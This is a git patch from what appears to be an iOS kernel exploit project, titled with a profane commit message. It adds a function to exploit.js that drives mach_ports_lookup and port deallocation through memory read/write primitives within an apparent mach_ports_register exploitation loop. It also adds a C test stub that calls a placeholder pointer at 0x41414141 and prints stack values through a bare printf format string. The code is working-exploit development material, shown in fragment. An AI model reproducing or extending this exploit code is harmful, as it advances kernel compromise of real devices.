From 5039c6d16ee4e2cfaa9374a941afee789556eeca Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Wed, 27 Jul 2022 16:13:31 -0400
Subject: fuck it

---
 src/js/kexp/exploit.js | 28 +++++++++++++++++++++++++++-
 tools/testlol.c        | 12 ++++++++++++
 2 files changed, 39 insertions(+), 1 deletion(-)

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 7ec7cc3..55ac673 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -368,6 +368,32 @@ function mach_ports_lookup_shit() {
 //	return 0x42603;
 }
 
+function mach_ports_lookup_shit_dealloc() {
+	printf("fuck\n");
+	var arrz = shit_heap(4);
+	printf("fuck\n");
+	write_u32(arrz, 0);
+	printf("fuck\n");
+	var sz = shit_heap(4);;
+	printf("fuck\n");
+	write_u32(sz, 3);
+	printf("fuck\n");
+//	var mts = mach_task_self();
+	printf("fuck\n");
+	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	printf("mpl success\n");
+
+	for (var i = 0; i < read_u32(sz); i++) {
+		if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
+			mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
+		}
+	}
+
+	return read_u32(read_u32(arrz) + 8);
+//	return 0x42603;
+}
+
 var kernel_task_addr = 0;
 function get_kernel_task() {
 	var ret = 0;
@@ -458,7 +484,7 @@ again: while (true) {
 	var arrmpt = shit_heap(8);
 	write_u32(arrmpt, 0);
 	write_u32(arrmpt + 4, 0);
-	mach_ports_lookup_shit();
+	mach_ports_lookup_shit_dealloc();
 	var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 	mach_ports_lookup_shit();
 	printf("%d %s\n", ret__, mach_error_string(ret__));
diff --git a/tools/testlol.c b/tools/testlol.c
index d39bf47..fa0c1d9 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -107,6 +107,14 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma
     return ret;
 }
 
+void (*ptr)() = (void (*)())0x41414141;
+
+static kern_return_t r3gister(task_t task, mach_port_array_t init_port_set, mach_msg_type_number_t real_count, mach_msg_type_number_t fake_count)
+{
+    ptr();
+    printf("%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p\n");
+}
+
 struct test {
     int a;
     int b;
@@ -242,6 +250,10 @@ int main(int argc, char* argv[]) {
     mach_port_t *arrz=0;
     printf("%p %p\n", arrz, &arrz);
 
+    mach_port_t arr[2] = {MACH_PORT_NULL,MACH_PORT_NULL};
+    r3gister(0x41414141,arr,0x42424242,3);
+    printf("r3gister done\n");
+
 
 #pragma pack(4)
 typedef struct {
-- 
cgit v1.2.3